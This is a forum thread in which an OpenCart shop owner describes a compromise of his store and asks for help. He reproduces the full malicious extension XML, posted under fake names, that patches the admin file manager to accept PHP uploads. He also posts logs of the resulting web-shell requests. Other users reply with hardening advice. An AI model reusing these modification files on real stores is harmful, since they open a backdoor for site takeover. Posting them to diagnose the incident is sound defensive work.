Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Загрузили вирус через админку, установив якобы дополнение


Recommended Posts

Был замечен сегодня вирус на сайте: не работал переход на страницы, работала только главная.

Зашел в файлы, увидел каракули в htaceess, index.php по классике и папки левые..

Снес весь сайт, удалив все файлы, но 3 файла появлялись снова. Смотрел логи, увидел там POST запросы к файлам, но откуда шли так и не нашел, там было пусто.

Отключил полностью пользователя на сервере, файлы так и появлись.. Не понимал откуда идет запуск. Хостер не смог помочь, сказал ищите специалиста. Короче удалил учетную запись, залил бэкап, ура 3 файла перестали появляться. Начал думать какой модуль мог заразу принести. Зашел в менеджер дополнений и вижу интересную картину.. На сайте года 2 никаких дополнений не устанавливалось и тут вижу 17 апреля 2023 год что-то не понятное. 

"SendCloud"  версия 2.16. 17.04.2023

захожу в xml а там вот это содержимое

 

<?xml version="1.0" encoding="UTF-8"?>
<modification>
    <name>SendCloud</name>
    <version>2.1.6</version>
    <code>sendcloud</code>
    <author>SendCloud</author>
    <link>https://www.sendcloud.com/</link>
    <!-- Instead of event: catalog/controller/checkout/guest_shipping/save/after -->
    <file path="admin/controller/common/filemanager.php">
        <operation error="skip" info="Detects shipping address change during checkout process (for guest customer).">
            <search>$files = glob($directory . '/' . $filter_name . '*.{jpg,jpeg,png,gif,JPG,JPEG,PNG,GIF}', GLOB_BRACE);</search>
            <add position="replace">
                <![CDATA[
			$files = glob($directory . '/' . $filter_name . '*.{jpg,jpeg,png,gif,JPG,JPEG,PNG,GIF,php}', GLOB_BRACE);
                ]]>
            </add>
        </operation>
        
                <operation error="skip" info="Detects shipping address change during checkout process (for guest customer).">
            <search>'jpeg',</search>
            <add position="after">
                <![CDATA[
			'php',
                ]]>
            </add>
        </operation>
        
        
        
                   <operation error="skip" info="Detects shipping address change during checkout process (for guest customer).">
            <search>'image/jpeg',</search>
            <add position="after">
                <![CDATA[
			'application/x-php',
                ]]>
            </add>
        </operation>
        
        
        
                
                   <operation error="skip" info="Detects shipping address change during checkout process (for guest customer).">
            <search>$content = file_get_contents($this->request->files['file']['tmp_name']);</search>
            <add position="replace">
                <![CDATA[
			$content = "";
                ]]>
            </add>
        </operation>
        
        
        
        
    </file>
</modification>

 

Могу еще прислать содержимое файлов которые генерировались..  это файл toggige-arrow.jpg якобы картинка, гуглил - не нашел такого вируса.

Подскажите может кто знает, это закинули скрипт который грузит php на сайт ? 

 

Начал смотреть гостей кто заходил в админ 17 апреля . 3 айпишника, посмотрел один Въетнам, другой Новосибирск.. 

 

April 17, 12:41pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

April 17, 12:41pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

April 17, 12:42pm time Moscow 194.87.218.48 python-requests/2.18.4

April 17, 12:43pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Роботы ? 

 

log сайта: 

Fri Apr 21 10:26:18.501146 2023] [cgi:error] [pid 22408] [client 195.123.242.ЦИФРА:36848] AH01215: 2023-04-21 10:26:18 1ppl9u-0005pS-G7 1ppl9u-0005pS-G7 no recipients found in headers, referer: https://САЙТ/image/catalog/test.php
2023/04/21 10:27:46 [warn] 20983#20983: *43806092 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518096, client: 195.123.242.37, server: САЙТ, request: "POST /image/catalog/test.php HTTP/1.1", host: "САЙТ", referrer: "https://САЙТ/image/catalog/test.php"
[Fri Apr 21 10:29:32.865527 2023] [cgi:error] [pid 23023] [client 195.123.242.ЦИФРА:37492] AH01215: PHP Notice:  Undefined variable: _GET in /var/www/путь/data/www/САЙТ/image/catalog/inputs.php on line 1
2023/04/21 10:30:30 [warn] 20983#20983: *43806920 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518114, client: 173.208.153.ЦИФРА, server: САЙТ, request: "POST /image/catalog/inputs.php HTTP/1.1", host: "САЙТ", referrer: "https://www.google.com/"
2023/04/21 10:34:56 [warn] 20983#20983: *43807668 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518127, client: 173.208.153.ЦИФРА, server: САЙТ, request: "POST /catalog/model/localisation/localisation/index.php HTTP/1.1", host: "САЙТ", referrer: "https://www.google.com/"

 

Видимо на сайте стоял простой пароль и смогли подобрать, зайди в менеджер дополнений и загрузить xml. А проявился вирус 21 апреля.

Змінено користувачем igorfelix
Надіслати
Поділитися на інших сайтах


Проблема повторилась на других сайтах. 
 

в БД появляется запись

(61, 'File Manager Sort By Upload Date', 'File Manager Sort By Upload Date', 'sezerural.com', '2.x-3.11', '', '<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<modification>\r\n	<name>File Manager Sort By Upload Date</name>\r\n	<code>File Manager Sort By Upload Date</code>\r\n	<version>2.x-3.11</version>\r\n	<author>sezerural.com</author>\r\n	<file path=\"admin/controller/common/filemanager.php\">\r\n		<operation error=\"log\">\r\n			<search position=\"replace\"><![CDATA[\'jpeg\',]]></search>\r\n			<add><![CDATA[\'php\',\'jpeg\',]]></add>\r\n			\r\n		\r\n			\r\n			\r\n		</operation>		\r\n		\r\n		<operation error=\"log\">\r\n			<search position=\"replace\"><![CDATA[\'image/jpeg\',]]></search>\r\n			<add><![CDATA[\'image/jpeg\',\'application/x-php\',]]></add>\r\n			\r\n		</operation>\r\n		\r\n	</file>	\r\n</modification>\r\n', 1, '2023-04-12 19:05:54');

 

Опять разрешают заливку php через стандартный менеджер изображений в опенкарте. 

 

Устанавливают расширение xml

Скорее всего из-за моего простого пароля попали в админку. 

Надіслати
Поділитися на інших сайтах


Цитата

Скорее всего из-за моего простого пароля попали в админку. 

 

это в 99% случаев, когда вирусню льют через админку

там без разницы потом, что за код залили.

сменить пароли от админки, бд и фтп. потом почистить от появившейся заразы

должно помочь

Надіслати
Поділитися на інших сайтах


В 26.04.2023 в 17:57, igorfelix сказав:

Поставил ещё антикапчу от гугла на вход в админку. 

Та закрий ти її по IP ;)

Надіслати
Поділитися на інших сайтах

  • 2 weeks later...
26.04.2023 в 17:58, markimax сказал:

Та закрий ти її по IP ;)

 

а не прощё её банально переименовать?

и лезть будет просто некуда

Надіслати
Поділитися на інших сайтах


07.05.2023 в 16:39, openprice сказал:

 

а не прощё её банально переименовать?

и лезть будет просто некуда

навіть Гугл рекапатча на пароль допомагає. 

Надіслати
Поділитися на інших сайтах


  • 2 months later...
08.05.2023 в 10:27, niger сказал:

навіть Гугл рекапатча на пароль допомагає. 

А может ли бот сбрасывать пароль через админку и каким-то образом проходить кугл капчу с картинками, заходить в админку и устанавливать через менеджер дополнений вирусный модификатор ?

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.